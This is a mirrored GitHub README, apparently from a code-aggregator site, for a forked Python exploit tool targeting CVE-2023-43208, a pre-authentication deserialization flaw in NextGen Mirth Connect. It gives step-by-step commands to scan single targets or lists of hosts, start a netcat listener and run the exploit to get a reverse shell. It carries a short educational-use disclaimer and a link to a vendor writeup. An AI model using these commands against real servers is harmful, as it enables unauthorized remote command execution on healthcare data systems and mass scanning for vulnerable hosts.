Coder Social home page Coder Social logo

preemware / nextgen-mirth-connect-exploit Goto Github PK

View Code? Open in Web Editor NEW

This project forked from gotr00t0day/nextgen-mirth-connect-exploit

0.0 0.0 0.0 18 KB

A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application.

Python 100.00%

nextgen-mirth-connect-exploit's Introduction

NextGen-Mirth-Connect-Exploit

A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application.


Installation Instructions

To utilize this exploit tool, follow these simple steps:

  1. Clone the Repository:

    • Open a terminal or command prompt.
    • Run the command: git clone https://github.com/gotr00t0day/NextGen-Mirth-Connect-Exploit.git
  2. Navigate to the Project Directory:

    • Change into the project directory with: cd NextGen-Mirth-Connect-Exploit
  3. Install Dependencies:

    • Ensure you have Python3 and pip installed on your system.
    • Install required Python libraries with: pip3 install -r requirements.txt

How to Use

Check Vulnerability

  • To check if a specific target is vulnerable, use:

    python3 mirth_connect_exploit.py -t <Target_IP> -p <Port>
    
  • To check a list of targets from a file, use:

    python3 mirth_connect_exploit.py -f <Filename>
    

Exploit a Target

  • First, set up a listener on your local machine:

    nc -lvnp <Listener_Port>
    
  • Then, to exploit a vulnerable target and get a reverse shell, run:

    python3 mirth_connect_exploit.py -t <Target_IP> -p <Port> -lh <Local_Host> -lp <Local_Port> --exploit
    

Note: Replace <Target_IP>, <Port>, <Filename>, <Listener_Port>, <Local_Host>, and <Local_Port> with your actual values.


Detailed Writeup and Background

For an in-depth analysis and understanding of the CVE-2023-43208 vulnerability within NextGen Mirth Connect, and how this exploit works, refer to the detailed write-up provided by Horizon3.ai:

Writeup for CVE-2023-43208 NextGen Mirth Connect Pre-Auth RCE

This comprehensive guide offers insights into the vulnerability's technical details, impact assessment, and step-by-step exploitation process.


Disclaimer

The information and tools provided are for educational and security research purposes only. Use of this tool for attacking targets without prior mutual consent is illegal. The developer assumes no liability and is not responsible for any misuse or damage caused by this tool.

nextgen-mirth-connect-exploit's People

Contributors

gotr00t0day avatar preemware avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.